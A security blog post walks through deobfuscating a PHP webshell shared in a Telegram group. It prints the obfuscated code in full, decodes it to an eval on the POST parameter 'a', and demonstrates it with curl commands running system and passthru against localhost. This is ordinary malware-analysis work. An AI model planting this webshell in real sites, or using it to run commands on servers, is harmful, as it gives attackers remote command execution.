khairulazam.net

Just my simple blog.

Analysis Write-Ups

Deobfuscating PHP Webshell

By zam #analysis, #coding, #forensic, #php

It started with a person in one of Telegram group that I’ve joined; asking help to reverse the code given & explains what the code does.

The code as follow:

a123<?php $GUya=create_function(chr(0x6ae0/0x2f8).chr(01071-0706).chr(0205072/01146).chr(0222535/01261).str_rot13('r'),str_rot13('r').str_rot13('i').base64_decode('YQ==').chr(0x16044/0x343).base64_decode('KA==').chr(01666-01622).chr(0x3d6-0x363).base64_decode('bw==').chr(0x394-0x327).str_rot13('r').chr(20541/501).chr(0x4772/0x136));$GUya(base64_decode('MTc1M'.'zg0O0'.'BldkF'.'sKCRf'.''.chr(0200650/01410).str_rot13('R').str_rot13('9').chr(38808/462).chr(01143-01015).''.''.chr(0541-0433).base64_decode('dA==').str_rot13('u').str_rot13('K').str_rot13('F').''.'k7NTI'.'2MTUy'.'Ow=='.''));?>

It seems like a PHP code. Lets beautify it:

a123
<?php 
$GUya=create_function(
	chr(0x6ae0/0x2f8).
	chr(01071-0706).
	chr(0205072/01146).
	chr(0222535/01261).
	str_rot13('r'),
	str_rot13('r').
	str_rot13('i').
	base64_decode('YQ==').
	chr(0x16044/0x343).
	base64_decode('KA==').
	chr(01666-01622).
	chr(0x3d6-0x363).
	base64_decode('bw==').
	chr(0x394-0x327).
	str_rot13('r').
	chr(20541/501).
	chr(0x4772/0x136)
);
$GUya(
	base64_decode(
		'MTc1M'.
		'zg0O0'.
		'BldkF'.
		'sKCRf'.
		''.
		chr(0200650/01410).
		str_rot13('R').
		str_rot13('9').
		chr(38808/462).
		chr(01143-01015).
		''.
		''.
		chr(0541-0433).
		base64_decode('dA==').
		str_rot13('u').
		str_rot13('K').
		str_rot13('F').
		''.
		'k7NTI'.
		'2MTUy'.
		'Ow=='.
		''
	)
);
?>

Hmm.. Seem like it been obfuscated with ROT13, Base64 & Chr. Tried to Google couple of string from the code to see if there’s any match, but none found.

Based on the code given, observed there are 2 function; create_function & base64_decode.

I wonder what are those for. Lets print each function to see.

Print function create_function:

<?php
  print chr(0x6ae0/0x2f8).chr(01071-0706).chr(0205072/01146).chr(0222535/01261).str_rot13('r').str_rot13('r').str_rot13('i').base64_decode('YQ==').chr(0x16044/0x343).base64_decode('KA==').chr(01666-01622).chr(0x3d6-0x363).base64_decode('bw==').chr(0x394-0x327).str_rot13('r').chr(20541/501).chr(0x4772/0x136);
?>

The output:

$someeval($some);

Print function base64_decode:

<?php
  print base64_decode('MTc1M'.'zg0O0'.'BldkF'.'sKCRf'.''.chr(0200650/01410).str_rot13('R').str_rot13('9').chr(38808/462).chr(01143-01015).''.''.chr(0541-0433).base64_decode('dA==').str_rot13('u').str_rot13('K').str_rot13('F').''.'k7NTI'.'2MTUy'.'Ow=='.'');
?>

The output:

175384;@evAl($_POST[a]);526152;

Now we know that this is a webshell that uses HTTP POST request on ‘a’ parameter to executes command.

Lets try it using cURL:

$ curl http://localhost/my.php -d "a=system(whoami);"
a123desktop-vov7t\foss

$ curl http://localhost/my.php -d "a=shell_exec(whoami);"
a123

$ curl http://localhost/my.php -d "a=exec(whoami);"
a123

$ curl http://localhost/my.php -d "a=passthru(whoami);"
a123desktop-vov7t\foss

By zam

Related Post

Analysis Write-Ups

From ClickFix/ClickVerify to Lumma Stealer – The Rise of Self-Pwn Techniques

zam
Analysis Write-Ups

Malcore.io Challenge – Stacy

zam
Analysis Write-Ups

Deobfuscating Malicious PowerShell Script – ClickFix PowerShell

zam

Any Comments?

This site uses Akismet to reduce spam. Learn how your comment data is processed.